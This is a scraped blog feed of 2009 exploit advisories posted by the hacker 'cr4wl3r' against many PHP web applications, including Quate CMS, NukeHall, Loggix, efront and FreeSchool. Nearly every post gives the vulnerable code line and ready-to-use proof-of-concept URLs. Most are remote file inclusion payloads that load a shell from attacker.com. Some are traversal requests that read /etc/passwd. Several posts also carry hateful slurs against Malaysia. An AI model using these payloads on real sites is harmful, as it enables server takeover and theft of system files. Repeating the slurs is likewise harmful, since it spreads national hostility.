/>########################################################################<br />####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################<br />########################################################################<br />########################################################################<br /><br /><br /> [ Gorontalo / 2009 ]<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5741301404854965178?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-51902849109796966492009-12-05T19:26:00.002-08:002009-12-05T19:27:08.891-08:00<pre> [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]<br /><br />########################################################################<br />#Public Media Manager <= 1.3 (forms_dir) Remote File Include Vulnerability<br />#Download Script : http://sourceforge.net/projects/pmm-cms/files/<br />#Dork : die("Lamers attempt"); :D<br />########################################################################<br />#<br />#Vuln : ./pmm-cms-1.3/comcal/calmenu.php (line 4)<br /># <?php<br /># require $forms_dir."calmenuform.php";<br /># ?><br />#PoC : http://server/[path]/comcal/calmenu.php?forms_dir=http://attacker.com/shell.txt?cmd<br />#<br />#<br />########################################################################<br />########################################################################<br />####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################<br />########################################################################<br />########################################################################<br /><br /> [ Gorontalo / 2009 ]<br /><br /><br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5190284910979696649?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-44951321922785168032009-12-05T19:26:00.001-08:002009-12-05T19:26:46.949-08:00[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]<br /><br />########################################################################<br />#Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability<br />#Download Script : http://quate.net/quatecms<br />#Dork : die("lamers attempt"); :P<br />########################################################################<br />#<br />#Vuln RFI : ./QuateCMS_035/admin/includes/header.php (line 27)<br /># <?php<br /># if ($bypass_restrict != 1) {<br /># require_once($secure_page_path. "includes/secure.php");<br /># }<br /># ?><br />#PoC : http://[target]/[path]/admin/includes/header.php?secure_page_path=http://[attacker]/shell.txt???<br />#<br />#<br />#########################################################################<br />#<br />#Vuln LFI : ./QuateCMS_035/admin/includes/footer.php (line 4)<br /># <?PHP<br /># if ($not_logged_in != 1) {<br /># if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) {<br /># require_once("themes/" .$row_secure['account_theme']. "/footer.php");<br /># ?><br />#PoC : http://[target]/[path]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../etc/passwd<br />#<br />########################################################################<br />########################################################################<br />####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################<br />########################################################################<br />########################################################################<br /><br /> [ Gorontalo / 2009 ]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4495132192278516803?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-9253975310794399982009-12-05T19:25:00.004-08:002009-12-05T19:26:19.921-08:00[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]<br /><br />########################################################################<br />#ISPworker <= 1.23 Remote File Disclosure exploit<br />#Download Script : http://www.ispware.de/_files/ispworker-1.23.tar.gz<br />#Dork : die("lamers attempt"); :P<br />########################################################################<br />#<br />#Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php<br />#<br /># <?header('Content-type: '.$_REQUEST[type]);<br /># header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"');<br /># readfile("./tmp/$ticketid"."_".$_REQUEST[filename]);<br /># ?><br />#<br />#PoC : http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd<br /># http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd<br />#<br />########################################################################<br />########################################################################<br />####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################<br />########################################################################<br />########################################################################<br /><br /> [ Gorontalo / 2009 ]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-925397531079439998?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-46536913361959641752009-12-05T19:25:00.003-08:002009-12-05T19:25:38.894-08:00<pre> [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]<br /><br />########################################################################<br />#Ciamos CMS <= 0.9.5 (module_path) Remote File Include Vulnerability<br />#Download Script : http://sourceforge.net/projects/ciamosmodules/files/<br />#Dork : die("Hacking attempt"); :D<br />########################################################################<br />#<br />#Vuln : ./ciamos/modules/pms/index.php (line 13)<br /># <?php<br /># include_once($module_path.'include/header.php');<br /># ?><br />#PoC : http://server/modules/pms/index.php?module_path=http://[attacker]/shell.txt???<br />#<br />########################################################################<br />########################################################################<br />####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################<br />########################################################################<br />########################################################################<br /><br /><br /><br /> [ Gorontalo / 2009 ]<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4653691336195964175?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-90082424249387730122009-12-05T19:25:00.001-08:002009-12-05T19:25:10.790-08:00<pre> [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]<br /><br />########################################################################<br />#SweetRice <= 0.5.0 Remote File Include Vulnerability<br />#Download Script : http://php.opensourcecms.com/scripts/redirect/download.php?id=353<br />#Dork : die("lamers attempt"); :P<br />########################################################################<br />#<br />#Vuln : ./sweetrice/_plugin/subscriber/inc/post.php (line 2)<br /># <?php<br /># include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;<br /># ?><br />#PoC : http://server/_plugin/subscriber/inc/post.php?root_dir=http://[attacker]/shell.txt???<br />#<br />#<br />#<br />########################################################################<br />########################################################################<br />####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################<br />########################################################################<br />########################################################################<br /><br /><br /><br /><br /> [ Gorontalo / 2009<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-9008242424938773012?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-29180739476131442382009-12-05T19:24:00.001-08:002009-12-05T19:24:43.368-08:00<pre> [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]<br /><br />########################################################################<br />#phptraverse <= 0.8.0 Remote File Include Vulnerability<br />#Download Script : http://sourceforge.net/projects/phptraverse/files/<br />#Dork : die("Hacking attempt"); :D<br />########################################################################<br />#<br />#Vuln : ./phptraverse-0.8.0/assets/plugins/mp3_id/mp3_id.php (line 32)<br /># <?php<br /># include_once $GLOBALS['BASE'].'/PEAR/PEAR.php';<br /># ?><br />#PoC : http://server/[path]/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://attacker.com/shell.txt?cmd<br />#<br />#<br />#<br />########################################################################<br />#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,<br /># dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*<br />########################################################################<br /><br />/##############################################\<br /># all member at sekuritionline.net #<br /># all member at manadocoding.net #<br />\##############################################/<br /><br /> [ Gorontalo / 2009 ]<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-2918073947613144238?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-83789657175919733902009-12-05T19:23:00.002-08:002009-12-05T19:24:00.668-08:00<pre> [ Discovered by cr4wl3r \ Indonesian Hacker ]<br /><br />########################################################################<br /># OPT (Outreach Project Tool) <= 1.2.6 [CRM_path] Remote File Include Vulnerability<br /># Download Script : http://sourceforge.net/projects/outreach<br /># Dork : "Adhan Handsome" :D<br />########################################################################<br />#<br /># Vuln : ./OPT_1-2-7_MAX/opt/forums/Forum_Include/index.php (line 10)<br /># <?php<br /># include "$CRM_path/forums/Forum_Include/forum_admin.inc";<br /># ?><br /># PoC : http://server/[path]/forums/Forum_Include/index.php?CRM_path=http://[attacker]/shell.txt???<br />#<br />#<br />#<br />########################################################################<br /># Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,<br /># dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*<br />########################################################################<br /><br />/##############################################\<br /># all member at sekuritionline.net #<br /># all member at manadocoding.net #<br />\##############################################/<br /><br /># Contact Me : cr4wl3r[4t]linuxmail[dot]org<br /><br /> [ Gorontalo / 2009 ]<br /><br /><br /><br /><br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8378965717591973390?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-44068537426980260972009-12-05T19:23:00.001-08:002009-12-05T19:23:35.000-08:00<pre> [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]<br /><br />########################################################################<br />#NukeHall <= 0.3 Multiple Remote File Include Vulnerability<br />#Download Script : http://sourceforge.net/project/NukeHall/files/<br />#Dork : die("Hacking attempt"); :D<br />########################################################################<br />#<br />#Vuln : ./nukehall_0.3/admin/modules/blocks.php (line 28)<br /># <?php<br /># include $spaw_root.'spaw_control.class.php';<br /># ?><br />#PoC : http://server/[path]/admin/modules/blocks.php?spaw_root=http://attacker.com/shell.txt?cmd<br />#<br />#<br />#Vuln : ./nukehall_0.3/admin/modules/messages.php (line 28)<br /># <?php<br /># include $spaw_root.'spaw_control.class.php';<br /># ?><br />#PoC : http://server/[path]/admin/modules/messages.php?spaw_root=http://attacker.com/shell.txt?cmd<br />#<br />#<br />#Vuln : ./nukehall_0.3/admin/modules/stories.php (line 28)<br /># <?php<br /># include $spaw_root.'spaw_control.class.php';<br /># ?><br />#PoC : http://server/[path]/admin/modules/stories.php?spaw_root=http://attacker.com/shell.txt?cmd<br />#<br />#<br />#<br />#<br />########################################################################<br />#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,<br /># dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*<br />########################################################################<br /><br />/##############################################\<br /># all member at manadocoding.net #<br /># all member at sekuritionline.net #<br />\##############################################/<br /><br /> [ Gorontalo / 2009 ]<br /><br /><br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4406853742698026097?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-67008380607942099082009-12-05T19:21:00.000-08:002009-12-05T19:23:00.922-08:00<pre> [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]<br /><br />########################################################################<br />#KR-Web <= 1.1b2 Remote File Include Vulnerability<br />#Download Script : http://sourceforge.net/projects/krw/files/<br />#Dork : die("Hacking attempt"); :D<br />########################################################################<br />#<br />#Vuln : ./KR-Web-1.1b2/adm/krgourl.php (line 2)<br /># <?php<br /># include "$DOCUMENT_ROOT/paths.inc";<br /># ?><br />#PoC : http://server/[path]/adm/krgourl.php?DOCUMENT_ROOT=http://attacker.com/shell.txt?cmd<br />#<br />#<br />#<br />########################################################################<br />#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,<br /># dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*<br />########################################################################<br /><br />/##############################################\<br /># all member at sekuritionline.net #<br /># all member at manadocoding.net #<br />\##############################################/<br /><br /> [ Gorontalo / 2009 ]<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6700838060794209908?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-71236591898171314432009-09-21T18:50:00.002-07:002009-09-21T18:51:00.806-07:00<pre>#######################[In The Name Of Allah]##########################<br />#Loggix Project <= 9.4.5 Multiple Remote File Include Vulnerability<br />#Download Script : http://sourceforge.net/projects/loggix/files/<br />#Author : cr4wl3r<br />#Contact : cr4wl3r[4t]linuxmail[dot]org<br />#Location : Gorontalo - INDONESIA<br />#Blog : http://sh3ll4u.blogspot.com<br />#Dork : No DoRk f0R ScRipT KiDDieS<br />########################################################################<br />#file :<br /># Calendar.php<br /># Comment.php<br /># Rss.php<br /># Trackback.php<br /># LM_Downloads.php<br />########################################################################<br />#Bugs :<br /># require_once $pathToIndex . '/lib/Loggix/Module.php';<br />########################################################################<br />#3xplo!t :<br />#http://target.com/[path]/lib/Loggix/Module/Calendar.php?pathToIndex=http://attacker.com/shell.txt???<br />#http://target.com/[path]/lib/Loggix/Module/Comment.php?pathToIndex=http://attacker.com/shell.txt???<br />#http://target.com/[path]/lib/Loggix/Module/Rss.php?pathToIndex=http://attacker.com/shell.txt???<br />#http://target.com/[path]/lib/Loggix/Module/Trackback.php?pathToIndex=http://attacker.com/shell.txt??? <br />#http://target.com/[path]/modules/downloads/lib/LM_Downloads.php?pathToIndex=http://attacker.com/shell.txt???<br />########################################################################<br />#Greetz : MyMom [alm]<br />#Special Thanks : str0ke, All MusLim HacKers<br />#Thanks 2 : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral, s4va,<br /># mywisdom, wendys, cyberpeace, agenr@t, basix, nTc, angky.tatoki, funky_sensey, exnome,<br /># aRiee, Romy.Chairul, Mr.C, Mr.Crossbeam, noQen, CyberSufi, untouch, g4pt3k, chawanua,<br /># d3vilnet, donyskaynet, panteto, MaRloN, Dew0<br />########################################################################<br /># F0r All MusLim In tHe W0rlD :<br /># SelaMat IduL FitRi 1 SyaWaL 1430H<br /># Takabbalallah Huminnawaminkum Minalaidin Walfaizin<br />########################################################################<br />#Note : No fuCk, JusT PeaCe<br />########################################################################<br />#sekuritionline.net (all crew sekuritionline)<br />#manadocoding.net (all crew manadocoding)<br />###########################[VIVA ISLAM]#################################<br /><br /># milw0rm.com [2009-09-21]</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7123659189817131443?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-5579163300137525722009-09-21T18:50:00.001-07:002009-09-21T18:50:44.160-07:00<pre>#######################[In The Name Of Allah]##########################<br />#ProdLer <= 2.0 Remote File Include Vulnerability<br />#Download Script : http://sourceforge.net/projects/prodler/files/<br />#Author : cr4wl3r<br />#Contact : cr4wl3r[4t]linuxmail[dot]org<br />#Location : Gorontalo - INDONESIA<br />#Blog : http://sh3ll4u.blogspot.com<br />#Dork : No DoRk f0R ScRipT KiDDieS<br />########################################################################<br />#file :<br /># prodler.class.php<br /># line 4 require_once $sPath.'include/variable.class.php';<br />########################################################################<br />#3xplo!t :<br />#http://target.com/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? <br />########################################################################<br />#Greetz : MyMom [alm]<br />#Special Thanks : str0ke, All MusLim HacKers<br />#Thanks 2 : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral, s4va,<br /># mywisdom, wendys, cyberpeace, agenr@t, basix, nTc, angky.tatoki, funky_sensey, exnome,<br /># aRiee, Romy.Chairul, Mr.C, Mr.Crossbeam, noQen, CyberSufi, untouch, g4pt3k, chawanua,<br /># d3vilnet, donyskaynet, panteto, MaRloN, Dew0<br />########################################################################<br /># F0r All MusLim In tHe W0rlD :<br /># SelaMat IduL FitRi 1 SyaWaL 1430H<br /># Takabbalallah Huminnawaminkum Minalaidin Walfaizin<br />########################################################################<br />#Note : No fuCk, JusT PeaCe<br />########################################################################<br />#sekuritionline.net (all crew sekuritionline)<br />#manadocoding.net (all crew manadocoding)<br />###########################[VIVA ISLAM]#################################<br /><br /># milw0rm.com [2009-09-21]</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-557916330013752572?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-23468194474288073172009-09-19T01:57:00.000-07:002009-09-19T02:00:18.631-07:00<pre>#######################[In The Name Of Allah]##########################<br />#PointComma <= 3.8b2 Remote File Include Vulnerability<br />#Download Script : http://nchc.dl.sourceforge.net/project/pointcomma/pointcomma/<br />#Author : cr4wl3r<br />#Contact : cr4wl3r[4t]linuxmail[dot]org<br />#Location : Gorontalo - INDONESIA<br />#Blog : http://sh3ll4u.blogspot.com<br />#Dork : No DoRk f0R ScRipT KiDDieS<br />########################################################################<br />#file :<br /># pctemplate.php<br /># line 14 require($pcConfig['smartyPath'].'Smarty.class.php');<br />########################################################################<br />#3xplo!t :<br />#http://target.com/[path]/includes/classes/pctemplate.php?pcConfig[smartyPath]=http://attacker.com/shell.txt??? <br />########################################################################<br />#Greetz : MyMom [alm]<br />#Special Thanks : str0ke, All MusLim HacKers<br />#Thanks 2 : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral, s4va,<br /># mywisdom, wendys, cyberpeace, agenr@t, basix, nTc, angky.tatoki, funky_sensey, exnome,<br /># aRiee, Romy.Chairul, Mr.C, Mr.Crossbeam, noQen, CyberSufi, untouch, g4pt3k, chawanua,<br /># d3vilnet, donyskaynet, panteto, MaRloN, Dew0<br />########################################################################<br /># F0r All MusLim In tHe W0rlD :<br /># SelaMat IduL FitRi 1 SyaWaL 1430H<br /># Takabbalallah Huminnawaminkum Minalaidin Walfaizin<br />########################################################################<br />#Note : No fuCk, JusT PeaCe<br />########################################################################<br />#sekuritionline.net (all crew sekuritionline)<br />#manadocoding.net (all crew manadocoding)<br />###########################[VIVA ISLAM]#################################</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-2346819447428807317?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-1297939267458438102009-09-19T00:52:00.000-07:002009-09-19T00:53:57.260-07:00<pre>#######################[In The Name Of Allah]##########################<br />#Public Media Manager <= 1.3 Remote File Include Vulnerability<br />#Download Script : http://sourceforge.net/projects/pmm-cms/files/<br />#Author : cr4wl3r<br />#Contact : cr4wl3r[4t]linuxmail[dot]org<br />#Location : Gorontalo - INDONESIA<br />#Blog : http://sh3ll4u.blogspot.com<br />#Dork : No DoRk f0R ScRipT KiDDieS<br />########################################################################<br />#file :<br /># calmenu.php<br /># line 4 <?require $forms_dir."calmenuform.php";?><br />########################################################################<br />#3xplo!t :<br />#http://target.com/[path]/comcal/calmenu.php?forms_dir=http://attacker.com/shell.txt??? <br />########################################################################<br />#Greetz : MyMom [alm]<br />#Special Thanks : str0ke, All MusLim HacKers<br />#Thanks 2 : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral, s4va,<br /># mywisdom, wendys, cyberpeace, agenr@t, basix, nTc, angky.tatoki, funky_sensey, exnome,<br /># aRiee, Romy.Chairul, Mr.C, Mr.Crossbeam, noQen, CyberSufi, untouch, g4pt3k, chawanua,<br /># d3vilnet, donyskaynet, panteto, MaRloN, Dew0<br />########################################################################<br /># F0r All MusLim In tHe W0rlD :<br /># SelaMat IduL FitRi 1 SyaWaL 1430H<br /># Takabbalallah Huminnawaminkum Minalaidin Walfaizin<br />########################################################################<br />#Note : No fuCk, JusT PeaCe<br />########################################################################<br />#sekuritionline.net (all crew sekuritionline)<br />#manadocoding.net (all crew manadocoding)<br />###########################[VIVA ISLAM]#################################</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-129793926745843810?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-43637314947341743122009-09-17T09:31:00.000-07:002009-09-17T09:32:27.623-07:00<pre>########################################################################<br />#phpPollScript <= 1.3 Remote File Include Vulnerability<br />#Download Script : http://download.tomex.org/phpPollScriptv13b.zip<br />#Author : cr4wl3r<br />#Contact : cr4wl3r[4t]linuxmail[dot]org<br />#Location : Gorontalo - INDONESIA<br />########################################################################<br />#file :<br /># init.poll.php<br /># line 2 $inc_path = dirname($include_class);<br /># line 3 require ($inc_path."/voting.poll.php");<br />########################################################################<br />#3xplo!t :<br />#http://target.com/[path]/php/init.poll.php?include_class=http://attacker.com/shell.txt/test/<br />########################################################################<br />#Greetz : MyMom [alm]<br />#Thanks 2 : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral<br />########################################################################<br />#sekuritionline.net (all crew sekuritionline)<br />#manadocoding.net (all crew manadocoding)<br />########################################################################<br /><br /># milw0rm.com [2009-09-16]</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4363731494734174312?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-48507162394331443002009-09-16T10:34:00.004-07:002009-09-16T10:35:04.040-07:00<pre>########################################################################<br />#efront <= 3.5.4 Remote File Include Vulnerability<br />#Download Script : http://sourceforge.net/projects/efrontlearning/files/<br />#Author : cr4wl3r<br />#Contact : cr4wl3r[4t]linuxmail[dot]org<br />#Location : Gorontalo - INDONESIA<br />########################################################################<br />#file :<br /># database.php<br />#line 15 require_once($path.'adodb/adodb.inc.php');<br />########################################################################<br />#3xplo!t :<br />#http://target.com/[path]/libraries/database.php?path=http://attacker.com/shell.txt??? <br />########################################################################<br />#Greetz : MyMom [alm]<br />#Thanks 2 : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral<br />########################################################################<br />#sekuritionline.net (all crew sekuritionline)<br />#manadocoding.net (all crew manadocoding)<br />########################################################################<br /><br /># milw0rm.com [2009-09-15]</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4850716239433144300?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-5156657798197663282009-09-16T10:34:00.003-07:002009-09-16T10:34:46.649-07:00<pre>######################################################################<br />#[x] FreeSchool <= 1.1.0 Mutiple Remote File Include Vulnerability <br />#[!] Download Script : http://sourceforge.net/projects/freeschool/files/ <br />#[!] Author : cr4wl3r <br />#[!] Contact : cr4wl3r[4t]linuxmail[dot]org <br />#[!] Location : Gorontalo - INDONESIA <br />#[!] Dork : "FuCk y0u MaLaYsia" <br />######################################################################<br /><br />[x] 3xplo!t : <br /> <br />http://localhost/[path]/biblioteca/bib_form.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/bib_pldetails.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/bib_plform.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/bib_plsearchc.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/bib_plsearchs.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/bib_save.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/bib_searchc.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/bib_searchs.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/edi_form.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/edi_save.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/gen_form.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/gen_save.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/lin_form.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/lin_save.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/luo_form.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/luo_save.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/sog_form.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/biblioteca/sog_save.php?CLASSPATH=[AvriLhea]<br />http://localhost/[path]/calendario/cal_insert.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/calendario/cal_save.php?CLASSPATH=[AvriLhea]<br />http://localhost/[path]/calendario/cal_saveactivity.php?CLASSPATH=[AvriLhea]<br />http://localhost/[path]/circolari/cir_save.php?CLASSPATH=[AvriLhea] <br />http://localhost/[path]/modulistica/mdl_save.php?CLASSPATH=[AvriLhea]<br /><br />######################################################################<br />#[!] Greetz : MyMom [alm] <br /># <br />#[!] Special Thanks : str0ke, google, sourceforge, All MusLiM HacKers <br />#<br />#[!] Thanks 2 : xoron, opt!x hacker, irvian, cyberlog<br />#<br />#[!] AlfaNet Cr3w GoRonTaLo : FaHry PunKs, RhyA HaMim, BoBy C00l, UyaN, ArYa.TaMa<br />#<br />#[!] My BiG BozZ MinJo.B0rj0e (YanG PunYa SepaRuH KaMpuNg Bugis, JaNgan LuPa Am-Am) :D<br />#<br />#[!] FuCk MaLaYsia, I HaTe MaLaYsia, h0w Ab0uT y0u???<br />#<br />#[!] sekuritionline.net | manadocoding.net <br />######################################################################<br /><br /># milw0rm.com [2009-09-03]</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-515665779819766328?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-5572548036378561772009-09-16T10:34:00.001-07:002009-09-16T10:34:26.376-07:00<pre>######################################################################<br />#[x] PHPope <= 1.0.0 Multiple Remote File Include Vulnerability <br />#[!] Download Script : http://sourceforge.net/projects/phpope/files/ <br />#[!] Author : cr4wl3r <br />#[!] Contact : cr4wl3r[4t]linuxmail[dot]org <br />#[!] Location : Gorontalo - INDONESIA <br />#[!] Dork : "FuCk y0u MaLaYsia" <br />######################################################################<br /><br />[x] 3xplo!t : <br /> <br />http://localhost/[path]/plugins/address/admin/index.php?GLOBALS[config][dir][plugins]=[AvriLhea] <br />http://localhost/[path]/plugins/im/compose.php?GLOBALS[config][dir][functions]=[AvriLhea]<br />http://localhost/[path]/plugins/cssedit/admin/index.php?GLOBALS[config][dir][classes]=[AvriLhea]<br /><br /><br />and many others<br /><br />######################################################################<br />#[!] Greetz : MyMom [alm] <br /># <br />#[!] Special Thanks : str0ke, google, sourceforge, All MusLiM HacKers <br />#<br />#[!] Thanks 2 : xoron, opt!x hacker, irvian, cyberlog<br />#<br />#[!] AlfaNet Cr3w GoRonTaLo : FaHry PunKs, RhyA HaMim, BoBy C00l, UyaN, ArYa.TaMa<br />#<br />#[!] My BiG BozZ MinJo.B0rj0e (YanG PunYa SepaRuH KaMpuNg Bugis, JaNgan LuPa Am-Am) :D<br />#<br />#[!] FuCk MaLaYsia, I HaTe MaLaYsia, h0w Ab0uT y0u???<br />#<br />#[!] sekuritionline.net | manadocoding.net <br />######################################################################<br /><br /># milw0rm.com [2009-09-03]</pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-557254803637856177?l=sh3ll4u.blogspot.com' alt='' /></div>r00t cr4wl3rhttp://www.blogger.com/profile/06940730132728454405noreply@blogger.com0tag:blogger.com,1999:blog-6120352052168366080.post-45820175738976059682009-09-16T10:33:00.001-07:002009-09-16T10:33:49.174-07:00<pre>$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$<br />%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%<br />&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;<br 